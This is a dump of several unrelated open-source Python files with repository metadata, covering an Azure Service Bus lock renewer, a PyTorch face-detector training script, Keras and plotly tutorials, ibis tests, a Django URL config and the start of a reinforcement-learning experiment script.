self._max_lock_renewal_duration = max_lock_renewal_duration
async def __aenter__(self) -> "AutoLockRenewer":
if self._shutdown.is_set():
raise ServiceBusError(
"The AutoLockRenewer has already been shutdown. Please create a new instance for"
" auto lock renewing."
)
return self
async def __aexit__(self, *args: Iterable[Any]) -> None:
await self.close()
def _renewable(
self, renewable: Union[ServiceBusReceivedMessage, ServiceBusSession]
) -> bool:
# pylint: disable=protected-access
if self._shutdown.is_set():
return False
if hasattr(renewable, "_settled") and renewable._settled: # type: ignore
return False
if renewable._lock_expired:
return False
try:
if not renewable._receiver._running: # type: ignore
return False
except AttributeError: # If for whatever reason the renewable isn't hooked up to a receiver
raise ServiceBusError(
"Cannot renew an entity without an associated receiver. "
"ServiceBusReceivedMessage and active ServiceBusReceiver.Session objects are expected."
)
return True
async def _auto_lock_renew(
self,
receiver: ServiceBusReceiver,
renewable: Renewable,
starttime: datetime.datetime,
max_lock_renewal_duration: float,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
renew_period_override: Optional[float] = None,
) -> None:
# pylint: disable=protected-access
_log.debug(
"Running async lock auto-renew for %r seconds", max_lock_renewal_duration
)
error: Optional[Exception] = None
clean_shutdown = False # Only trigger the on_lock_renew_failure if halting was not expected (shutdown, etc)
renew_period = renew_period_override or self._renew_period
try:
while self._renewable(renewable):
if (utc_now() - starttime) >= datetime.timedelta(
seconds=max_lock_renewal_duration
):
_log.debug(
"Reached max auto lock renew duration - letting lock expire."
)
raise AutoLockRenewTimeout(
"Auto-renew period ({} seconds) elapsed.".format(
max_lock_renewal_duration
)
)
if (renewable.locked_until_utc - utc_now()) <= datetime.timedelta(
seconds=renew_period
):
_log.debug(
"%r seconds or less until lock expires - auto renewing.",
renew_period,
)
try:
# Renewable is a session
await renewable.renew_lock() # type: ignore
except AttributeError:
# Renewable is a message
await receiver.renew_message_lock(renewable) # type: ignore
await asyncio.sleep(self._sleep_time)
clean_shutdown = not renewable._lock_expired
except AutoLockRenewTimeout as e:
error = e
renewable.auto_renew_error = e
clean_shutdown = not renewable._lock_expired
except Exception as e: # pylint: disable=broad-except
_log.debug("Failed to auto-renew lock: %r. Closing thread.", e)
error = AutoLockRenewFailed("Failed to auto-renew lock", error=e)
renewable.auto_renew_error = error
finally:
if on_lock_renew_failure and not clean_shutdown:
await on_lock_renew_failure(renewable, error)
def register(
self,
receiver: ServiceBusReceiver,
renewable: Union[ServiceBusReceivedMessage, ServiceBusSession],
max_lock_renewal_duration: Optional[float] = None,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
) -> None:
"""Register a renewable entity for automatic lock renewal.
:param receiver: The ServiceBusReceiver instance that is associated with the message or the session to
be auto-lock-renewed.
:type receiver: ~azure.servicebus.aio.ServiceBusReceiver
:param renewable: A locked entity that needs to be renewed.
:type renewable: Union[~azure.servicebus.aio.ServiceBusReceivedMessage,~azure.servicebus.aio.ServiceBusSession]
:param max_lock_renewal_duration: A time in seconds that the lock should be maintained for.
Default value is None. If specified, this value will override the default value specified at the constructor.
:type max_lock_renewal_duration: Optional[float]
:param Optional[AsyncLockRenewFailureCallback] on_lock_renew_failure:
An async callback may be specified to be called when the lock is lost on the renewable being registered.
Default value is None (no callback).
:rtype: None
"""
if not isinstance(renewable, (ServiceBusReceivedMessage, ServiceBusSession)):
raise TypeError(
"AutoLockRenewer only supports registration of types "
"azure.servicebus.ServiceBusReceivedMessage (via a receiver's receive methods) and "
"azure.servicebus.aio.ServiceBusSession "
"(via a session receiver's property receiver.session)."
)
if self._shutdown.is_set():
raise ServiceBusError(
"The AutoLockRenewer has already been shutdown. Please create a new instance for"
" auto lock renewing."
)
if renewable.locked_until_utc is None:
raise ValueError(
"Only azure.servicebus.ServiceBusReceivedMessage objects in PEEK_LOCK receive mode may"
"be lock-renewed. (E.g. only messages received via receive() or the receiver iterator,"
"not using RECEIVE_AND_DELETE receive mode, and not returned from Peek)"
)
starttime = get_renewable_start_time(renewable)
# This is a heuristic to compensate if it appears the user has a lock duration less than our base renew period
time_until_expiry = get_renewable_lock_duration(renewable)
renew_period_override = None
# Default is 10 seconds, but let's leave ourselves a small margin of error because clock skew is a real problem
if time_until_expiry <= datetime.timedelta(
seconds=self._renew_period + SHORT_RENEW_OFFSET
):
renew_period_override = (
time_until_expiry.seconds * SHORT_RENEW_SCALING_FACTOR
)
renew_future = asyncio.ensure_future(
self._auto_lock_renew(
receiver,
renewable,
starttime,
max_lock_renewal_duration or self._max_lock_renewal_duration,
on_lock_renew_failure or self._on_lock_renew_failure,
renew_period_override,
),
**self._internal_kwargs
)
self._futures.append(renew_future)
async def close(self) -> None:
"""Cease autorenewal by cancelling any remaining open lock renewal futures."""
self._shutdown.set()
if self._futures:
await asyncio.wait(self._futures)
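
async def _example_register_flow(receiver: ServiceBusReceiver) -> None:
    """Illustrative only: a hypothetical helper, not part of this module,
    showing the register() flow documented above. Assumes `receiver` is an
    open ServiceBusReceiver in PEEK_LOCK mode."""
    async with AutoLockRenewer(max_lock_renewal_duration=120) as renewer:
        async for message in receiver:
            # Keep the message lock alive while it is being processed.
            renewer.register(receiver, message, max_lock_renewal_duration=60)
            await receiver.complete_message(message)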
| [
"[email protected]"
] | |
af8bdce8b06b56c4b156043cf40cb6163573214a | 813212a9a3f211c25c4765795ed252d74b0273dd | /main.py | 1a8a253f008ccfeffd0ee5c0f2d0d54952d151e8 | [] | no_license | Suke0/DSFD_pytorch | 0228963441e75f62f1588e37a22e86c90340a0a9 | a8ae0f4930acdd81e05f73941a8b397daa35c489 | refs/heads/master | 2022-03-19T06:45:32.663406 | 2019-11-19T14:47:38 | 2019-11-19T14:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,535 | py | from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import os
import time
import shutil
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.init as init
import torch.utils.data as data
import numpy as np
from torch.autograd import Variable
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from data.config import cfg
from data.widerface import WIDERDetection, detection_collate
from layers.modules import MultiBoxLoss
from layers.functions import PriorBox
from models.factory import build_net, basenet_factory
parser = argparse.ArgumentParser(
description='DSFD face Detector Training With Pytorch')
parser.add_argument('--model',default='vgg', type=str,
choices=['vgg', 'resnet50', 'resnet101', 'resnet152'],
help='model for training')
parser.add_argument('--basenet',default='vgg16_reducedfc.pth',
help='Pretrained base model')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--batch_size',default=2, type=int,
help='Batch size for training')
parser.add_argument('--pretrained', default=True, type=str,
help='use pre-trained model')
parser.add_argument('--resume',default=None, type=str,
help='Checkpoint state_dict file to resume training from')
parser.add_argument('--num_workers',default=4, type=int,
help='Number of workers used in dataloading')
parser.add_argument('--distributed', default=True, type=str,
help='use distribute training')
parser.add_argument("--local_rank", default=0, type=int)
parser.add_argument('--lr', '--learning-rate',default=1e-3, type=float,
help='initial learning rate')
parser.add_argument('--momentum',default=0.9, type=float,
help='Momentum value for optim')
parser.add_argument('--weight_decay',default=5e-4, type=float,
help='Weight decay for SGD')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save_folder',default='weights/',
help='Directory for saving checkpoint models')
parser.add_argument('--prefix',default='dsfd_',
help='the prefix for saving checkpoint models')
args = parser.parse_args()
cudnn.benchmark = True
minmum_loss = np.inf
args.distributed = False
if 'WORLD_SIZE' in os.environ:
args.distributed = int(os.environ['WORLD_SIZE']) > 1
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
def main():
global args
global minmum_loss
args.gpu = 0
args.world_size = 1
if args.distributed:
args.gpu = args.local_rank % torch.cuda.device_count()
torch.cuda.set_device(args.gpu)
torch.distributed.init_process_group(backend='nccl',
init_method='env://')
args.world_size = torch.distributed.get_world_size()
args.total_batch_size = args.world_size * args.batch_size
# build dsfd network
print("Building net...")
basenet = basenet_factory(args.model)
dsfd_net = build_net('train', cfg.NUM_CLASSES, args.model)
model = dsfd_net
if args.pretrained:
base_weights = torch.load(args.save_folder + args.basenet)
print('Load base network {}'.format(args.save_folder + basenet))
if args.model == 'vgg':
model.vgg.load_state_dict(base_weights)
else:
model.resnet.load_state_dict(base_weights)
# for multi gpu
if args.distributed:
model = torch.nn.parallel.DistributedDataParallel(model)
model = model.cuda()
# optimizer and loss function
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum,
weight_decay=args.weight_decay)
criterion = MultiBoxLoss(cfg, True)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda(args.gpu))
args.start_epoch = checkpoint['epoch']
minmum_loss = checkpoint['minmum_loss']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
print('Initializing weights...')
dsfd_net.extras.apply(dsfd_net.weights_init)
dsfd_net.fpn_topdown.apply(dsfd_net.weights_init)
dsfd_net.fpn_latlayer.apply(dsfd_net.weights_init)
dsfd_net.fpn_fem.apply(dsfd_net.weights_init)
dsfd_net.loc_pal1.apply(dsfd_net.weights_init)
dsfd_net.conf_pal1.apply(dsfd_net.weights_init)
dsfd_net.loc_pal2.apply(dsfd_net.weights_init)
dsfd_net.conf_pal2.apply(dsfd_net.weights_init)
print('Loading wider dataset...')
train_dataset = WIDERDetection(cfg.FACE.TRAIN_FILE, mode='train')
val_dataset = WIDERDetection(cfg.FACE.VAL_FILE, mode='val')
train_loader = data.DataLoader(train_dataset, args.batch_size,
num_workers=args.num_workers,
shuffle=True,
collate_fn=detection_collate,
pin_memory=True)
val_batchsize = args.batch_size // 2
val_loader = data.DataLoader(val_dataset, val_batchsize,
num_workers=args.num_workers,
shuffle=False,
collate_fn=detection_collate,
pin_memory=True)
print('Using the specified args:')
print(args)
# load PriorBox
with torch.no_grad():
priorbox1 = PriorBox(input_size=[640,640], cfg=cfg, pal=1)
priors_pal1 = priorbox1.forward()
priors_pal1 = priors_pal1.cuda()
priorbox2 = PriorBox(input_size=[640,640], cfg=cfg, pal=2)
priors_pal2 = priorbox2.forward()
priors_pal2 = priors_pal2.cuda()
for epoch in range(args.start_epoch, args.epochs):
# train for one epoch
end = time.time()
train_loss = train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch)
val_loss = val(val_loader, model, priors_pal1, priors_pal2, criterion)
if args.local_rank == 0:
            is_best = val_loss < minimum_loss
            minimum_loss = min(val_loss, minimum_loss)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
                'minimum_loss': minimum_loss,
'optimizer': optimizer.state_dict(),
}, is_best, epoch)
        epoch_time = time.time() - end
        print('Epoch %s time cost %f' % (epoch, epoch_time))
def train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch):
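    """Train for one epoch over train_loader and return the average total loss."""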
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
loc_loss = AverageMeter()
cls_loss = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, data in enumerate(train_loader, 1):
input, targets = data
train_loader_len = len(train_loader)
adjust_learning_rate(optimizer, epoch, i, train_loader_len)
# measure data loading time
data_time.update(time.time() - end)
input_var = Variable(input.cuda())
target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets]
# compute output
output = model(input_var)
        loss_l_pal1, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var)
        loss_l_pal2, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var)
        loss = loss_l_pal1 + loss_c_pal1 + loss_l_pal2 + loss_c_pal2
        loss_l = loss_l_pal1 + loss_l_pal2
loss_c = loss_c_pal1 + loss_c_pal2
if args.distributed:
reduced_loss = reduce_tensor(loss.data)
reduced_loss_l = reduce_tensor(loss_l.data)
reduced_loss_c = reduce_tensor(loss_c.data)
else:
reduced_loss = loss.data
reduced_loss_l = loss_l.data
reduced_loss_c = loss_c.data
losses.update(to_python_float(reduced_loss), input.size(0))
loc_loss.update(to_python_float(reduced_loss_l), input.size(0))
cls_loss.update(to_python_float(reduced_loss_c), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
torch.cuda.synchronize()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Speed {3:.3f} ({4:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t'
'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format(
epoch, i, train_loader_len,
args.total_batch_size / batch_time.val,
args.total_batch_size / batch_time.avg,
batch_time=batch_time,
data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss))
return losses.avg
def val(val_loader, model, priors_pal1, priors_pal2, criterion):
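    """Evaluate on val_loader and return the average total loss."""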
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
loc_loss = AverageMeter()
cls_loss = AverageMeter()
    # switch to evaluate mode
model.eval()
end = time.time()
for i, data in enumerate(val_loader, 1):
input, targets = data
val_loader_len = len(val_loader)
# measure data loading time
data_time.update(time.time() - end)
input_var = Variable(input.cuda())
target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets]
# compute output
output = model(input_var)
        loss_l_pal1, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var)
        loss_l_pal2, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var)
        loss = loss_l_pal1 + loss_c_pal1 + loss_l_pal2 + loss_c_pal2
        loss_l = loss_l_pal1 + loss_l_pal2
loss_c = loss_c_pal1 + loss_c_pal2
if args.distributed:
reduced_loss = reduce_tensor(loss.data)
reduced_loss_l = reduce_tensor(loss_l.data)
reduced_loss_c = reduce_tensor(loss_c.data)
else:
reduced_loss = loss.data
reduced_loss_l = loss_l.data
reduced_loss_c = loss_c.data
losses.update(to_python_float(reduced_loss), input.size(0))
loc_loss.update(to_python_float(reduced_loss_l), input.size(0))
cls_loss.update(to_python_float(reduced_loss_c), input.size(0))
torch.cuda.synchronize()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0:
print('[{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Speed {2:.3f} ({3:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t'
'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format(
i, val_loader_len,
args.total_batch_size / batch_time.val,
args.total_batch_size / batch_time.avg,
batch_time=batch_time,
data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss))
return losses.avg
def to_python_float(t):
if hasattr(t, 'item'):
return t.item()
else:
return t[0]
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def reduce_tensor(tensor):
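    # All-reduce (sum) across workers, then divide by world size to get the mean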
rt = tensor.clone()
dist.all_reduce(rt, op=dist.reduce_op.SUM)
rt /= args.world_size
return rt
def adjust_learning_rate(optimizer, epoch, step, len_epoch):
"""LR schedule that should yield 76% converged accuracy with batch size 256"""
factor = epoch // 10
if epoch >= 30:
factor = factor + 1
lr = args.lr * (0.1 ** factor)
"""Warmup"""
if epoch < 1:
lr = lr * float(1 + step + epoch * len_epoch) / (5. * len_epoch)
if(args.local_rank == 0 and step % args.print_freq == 0 and step > 1):
print("Epoch = {}, step = {}, lr = {}".format(epoch, step, lr))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(state, is_best, epoch):
filename = os.path.join(args.save_folder, args.prefix + str(epoch)+ ".pth")
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, os.path.join(args.save_folder, 'model_best.pth'))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
72d0a91efae53216da61610416aa816a93f0d33a | a6ef13387c24c719a0dcfeb173521cd70beac282 | /python1/mod_call_fibs.py | 9415180ce0991ba45b0e4e2af1218228cf63e8c3 | [] | no_license | youjiahe/python | f60472d61daf58b7f5bb6aa557949de4babf8c9c | 74eb4c5ba211ae5ffed2040576e5eead75d16e7d | refs/heads/master | 2020-03-31T02:35:55.787809 | 2019-12-02T16:32:54 | 2019-12-02T16:32:54 | 151,831,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | #!/usr/bin/env python3
import mod_fibs
import mod_fibs as f
from mod_fibs import fib
mod_fibs.fib()
f.fib(5)
fib(10)
| [
"[email protected]"
] | |
605cceafb7745578da0e5040c7db03dccc5e5ffc | c5b69745b12ad36241fa792af44480eb70918cb0 | /ibis/tests/expr/test_literal.py | d43226d69d94263d4b54d263c8d01711f06d49e2 | [
"Apache-2.0"
] | permissive | vishalbelsare/ibis | bdbfde79086b268f4592cde009e0ffa52ece97e6 | 3fd6afb223fa442ccd0d9db69a74a431d5e7bcca | refs/heads/master | 2023-08-16T16:23:00.535467 | 2021-11-23T15:33:35 | 2021-11-23T15:33:35 | 141,067,229 | 0 | 0 | Apache-2.0 | 2021-11-29T20:12:43 | 2018-07-16T00:06:27 | Python | UTF-8 | Python | false | false | 1,388 | py | import ibis
from ibis.expr import datatypes
from ibis.expr.operations import Literal
from ibis.tests.util import assert_pickle_roundtrip
def test_literal_equality_basic():
a = ibis.literal(1).op()
b = ibis.literal(1).op()
assert a == b
assert hash(a) == hash(b)
def test_literal_equality_int_float():
# Note: This is different from the Python behavior for int/float comparison
a = ibis.literal(1).op()
b = ibis.literal(1.0).op()
assert a != b
def test_literal_equality_int16_int32():
    # Note: Literals with different integer widths are not equal, unlike plain Python ints
a = Literal(1, datatypes.int16)
b = Literal(1, datatypes.int32)
assert a != b
def test_literal_equality_int_interval():
a = ibis.literal(1).op()
b = ibis.interval(seconds=1).op()
assert a != b
def test_literal_equality_interval():
a = ibis.interval(seconds=1).op()
b = ibis.interval(minutes=1).op()
assert a != b
    # Currently these don't compare equal, but perhaps they should?
c = ibis.interval(seconds=60).op()
d = ibis.interval(minutes=1).op()
assert c != d
def test_pickle_literal():
a = Literal(1, datatypes.int16)
b = Literal(1, datatypes.int32)
assert_pickle_roundtrip(a)
assert_pickle_roundtrip(b)
def test_pickle_literal_interval():
a = ibis.interval(seconds=1).op()
assert_pickle_roundtrip(a)
| [
"[email protected]"
] | |
ae33e5e64e5edcb987ff8edd262f7a45e2a61f7b | 48c4dda8fbecb5bc9506eb0a318508c9a9f37aca | /deep learning from scratch.py | e10c1b2aa591751efd915dc08f92debac8407696 | [] | no_license | bigeyesung/DLkaggle | f59e8e2fdac430fd5e97cfc67e63c837a8b12cee | f57b10740b206ecff1bcbfdc7d4436ac8dcac28d | refs/heads/master | 2023-07-05T22:16:03.042595 | 2021-08-07T15:48:54 | 2021-08-07T15:48:54 | 262,594,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | import numpy as np
from sklearn.model_selection import train_test_split
from tensorflow import keras
img_rows, img_cols = 28, 28
num_classes = 10
def prep_data(raw):
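    # column 0 holds the class label; the remaining 784 columns are 28x28 pixel intensities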
y = raw[:, 0]
out_y = keras.utils.to_categorical(y, num_classes)
x = raw[:,1:]
num_images = raw.shape[0]
out_x = x.reshape(num_images, img_rows, img_cols, 1)
out_x = out_x / 255
return out_x, out_y
fashion_file = "../input/fashionmnist/fashion-mnist_train.csv"
fashion_data = np.loadtxt(fashion_file, skiprows=1, delimiter=',')
x, y = prep_data(fashion_data)
# Set up code checking
from learntools.core import binder
binder.bind(globals())
from learntools.deep_learning.exercise_7 import *
print("Setup Complete")
# 1) Start the model
from tensorflow import keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D
fashion_model= Sequential()
# Add the first layer
fashion_model.add(Conv2D(12,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1)))
#3) Add the remaining layers
fashion_model.add(Conv2D(20,kernel_size=3,activation='relu'))
fashion_model.add(Conv2D(20,kernel_size=3,activation='relu'))
fashion_model.add(Flatten())
fashion_model.add(Dense(100,activation='relu'))
fashion_model.add(Dense(num_classes, activation='softmax'))
# 4) Compile Your Model
fashion_model.compile(loss=keras.losses.categorical_crossentropy,optimizer='adam',metrics=['accuracy'])
# 5) Fit The Model
fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2)
# 6) Create A New Model
second_fashion_model = Sequential()
second_fashion_model.add(Conv2D(12,
activation='relu',
kernel_size=3,
input_shape = (img_rows, img_cols, 1)))
# Changed kernel sizes to be 2
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
# added an addition Conv2D layer
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
second_fashion_model.add(Flatten())
second_fashion_model.add(Dense(100, activation='relu'))
# It is important not to change the last layer. First argument matches number of classes. Softmax guarantees we get reasonable probabilities
second_fashion_model.add(Dense(10, activation='softmax'))
second_fashion_model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
second_fashion_model.fit(x, y, batch_size=100, epochs=4, validation_split=0.2)
#second_fashion_model.add(Conv2D(30,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1)))
#second_fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2)
| [
"[email protected]"
] | |
9cdfc43db870a09854c65404a963963d2cb4b43d | bbf744bfbfd9a935bd98c7cf54152a5d41194161 | /chapter_15/die_visual.py | d9629d134497d4af77867b78e009e95a6471a52b | [] | no_license | terranigmark/python-crash-course-projects | 65a7863be2d26fe8b91ac452b12203386eb0259a | 79ed9ed8e6a1bf015990a9556689379274231d13 | refs/heads/master | 2022-12-05T21:59:00.352140 | 2020-08-21T04:59:50 | 2020-08-21T04:59:50 | 266,263,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from plotly.graph_objs import Bar, Layout
from plotly import offline
from die import Die
# create a D6
die_1 = Die()
die_2 = Die(10)
# make some rolls and store results in a list
results = []
for roll_num in range(50_000):
result = die_1.roll() + die_2.roll()
results.append(result)
# analyze the results
frequencies = []
max_result = die_1.num_sides + die_2.num_sides
for value in range(2, max_result + 1):
frequency = results.count(value)
frequencies.append(frequency)
# visualize the results
x_values = list(range(2, max_result + 1))
data = [Bar(x = x_values, y = frequencies)]
x_axis_config = {'title': 'Result', 'dtick': 1}
y_axis_config = {'title': 'Frequency of Result'}
my_layout = Layout(title = 'Results of rolling a D6 and a D10 50,000 times', xaxis = x_axis_config, yaxis = y_axis_config)
offline.plot({'data': data, 'layout': my_layout}, filename = 'd6_d10.html') | [
"[email protected]"
] | |
cc0f68e8359cb95579b7d20bc6c3581cdc712cbd | 5e5e99e8493fbef64847494caf059c910c03c823 | /arrays/palindromic-substrings.py | b398b82336fa0371d58df3ab24c16dec63deba978 | [] | no_license | jcockbain/leetcode-python | f4e487b13ae4cacef9cbedfd4358f8ee0006e2b8 | d7f83ea5a11e4c8340c48698d29aa3bc0b942121 | refs/heads/master | 2020-07-09T19:58:42.933881 | 2019-10-28T23:34:34 | 2019-10-28T23:34:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | class Solution:
    def countSubstrings(self, s):
        """
        :type s: str
        :rtype: int
        """
        N = len(s)
        ans = 0
        for center in range(2 * N - 1):
            left = center // 2
            right = left + center % 2
            while left >= 0 and right < N \
                    and s[left] == s[right]:
                ans += 1
                left -= 1
                right += 1
        return ans
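# Example: Solution().countSubstrings("aaa") -> 6 (a, a, a, aa, aa, aaa)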
| [
"[email protected]"
] | |
0ba3ed98a522196a66863cdd0ce816654065b1b2 | 96a34a048c783a75736bf0ec775df22142f9ee53 | /services/web/server/src/simcore_service_webserver/db_listener/plugin.py | a4fda5b69bdff33c6386eee2e702f5c74e8bbb01 | [
"MIT"
] | permissive | ITISFoundation/osparc-simcore | 77e5b9f7eb549c907f6ba2abb14862154cc7bb66 | f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63 | refs/heads/master | 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 | MIT | 2023-09-14T20:23:09 | 2018-01-23T10:48:05 | Python | UTF-8 | Python | false | false | 870 | py | """
computation module is the main entry-point for computational backend
"""
import logging
from aiohttp import web
from servicelib.aiohttp.application_setup import ModuleCategory, app_module_setup
from ..db.plugin import setup_db
from ..projects.db import setup_projects_db
from ..rabbitmq import setup_rabbitmq
from ..socketio.plugin import setup_socketio
from ._db_comp_tasks_listening_task import create_comp_tasks_listening_task
_logger = logging.getLogger(__name__)
@app_module_setup(
__name__,
ModuleCategory.ADDON,
settings_name="WEBSERVER_DB_LISTENER",
logger=_logger,
)
def setup_db_listener(app: web.Application):
setup_rabbitmq(app)
setup_socketio(app)
setup_projects_db(app)
# Creates a task to listen to comp_task pg-db's table events
setup_db(app)
app.cleanup_ctx.append(create_comp_tasks_listening_task)
| [
"[email protected]"
] | |
2671fbfa345590729a83bef8261428be9a1bf018 | f8d5c4eb0244c4a227a615bc11c4c797760c3bec | /utils/rldraw.py | 2e944f936c3ad5ea6d074a6f0f9d74759cdd0c70 | [] | no_license | SamPlvs/reinforcement_learning_pytorch | e9b84659f870d938814177f1288fa4a2eb152599 | ffb9e53eeff011c4d3d5933a60c2b65fdbb18e2a | refs/heads/master | 2020-03-23T04:08:51.778325 | 2018-01-16T22:36:48 | 2018-01-16T22:36:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | import matplotlib.pyplot as plt
import numpy as np
def reward_episode(rewards, image_path, env_name='', method_name='', comment=''):
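    """Plot episode rewards against iteration index and save the figure to image_path."""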
reward_list = rewards
total_num = np.shape(reward_list)[0]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(list(range(total_num)), reward_list)
ax.set_xlabel('iteration')
ax.set_ylabel('rewards')
fig.suptitle("rewards_episodes_{}_{}_{}".format(env_name, method_name, comment))
fig.savefig(image_path) | [
"[email protected]"
] | |
5a75b3e5fcce03f7bd10d309196f67bdbc85c252 | 1d641f71f7aab082ed0b3ee805d6ff24b012ca2d | /ecommerce/carts/urls.py | aacdcfc353ac76fe4c2a60b52d83aa8708090caa | [] | no_license | Arkajit-m18/django-mca-major-project | 3d63ac96cd32c49e9a95629a680c5b0b7561cbd3 | 59b6f39d923a7e134bbb4bbb769bc06721321760 | refs/heads/master | 2020-05-18T00:31:44.435948 | 2019-05-15T15:23:21 | 2019-05-15T15:23:21 | 184,065,280 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | from django.urls import path
from . import views
app_name = 'carts'
urlpatterns = [
path('', views.cart_home, name = 'cart_home'),
path('update/', views.cart_update, name = 'cart_update'),
path('checkout/', views.checkout_home, name = 'checkout'),
path('checkout/success/', views.checkout_done, name = 'success'),
] | [
"[email protected]"
] | |
ca0d04658eb03c43a7dceddf7338d8c1f5cd372f | 346cf248e94fe97ba9c0a841827ab77f0ed1ff20 | /experiments/kdd-exps/experiment_DynaQtable_130_Feb14_0029.py | efabd8516978796f715bed1b20adcd12deaf5f2b | [
"BSD-3-Clause"
] | permissive | huangxf14/deepnap | cae9c7c654223f6202df05b3c3bc5053f9bf5696 | b4627ce1b9022d4f946d9b98d8d1622965cb7968 | refs/heads/master | 2020-03-26T02:54:01.352883 | 2018-08-12T01:55:14 | 2018-08-12T01:55:14 | 144,429,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,623 | py | # System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
sys.path.append('../')
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
sys_stdout = sys.stdout
log_prefix = '_'.join(['msg'] + os.path.basename(__file__).replace('.', '_').split('_')[1:5])
log_file_name = "{}_{}.log".format(log_prefix, sys.argv[1])
# Composite classes
class Dyna_QAgent(DynaMixin, QAgent):
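    """Tabular Q-learning agent augmented with simulated, model-based updates (Dyna-style)."""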
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
# Parameters
# |- Data
location = 'gym'
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - No Phi
phi_length = 0
dim_state = (1, 1, 3)
range_state = ((((0, 10), (0, 10), (0, 10)),),)
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
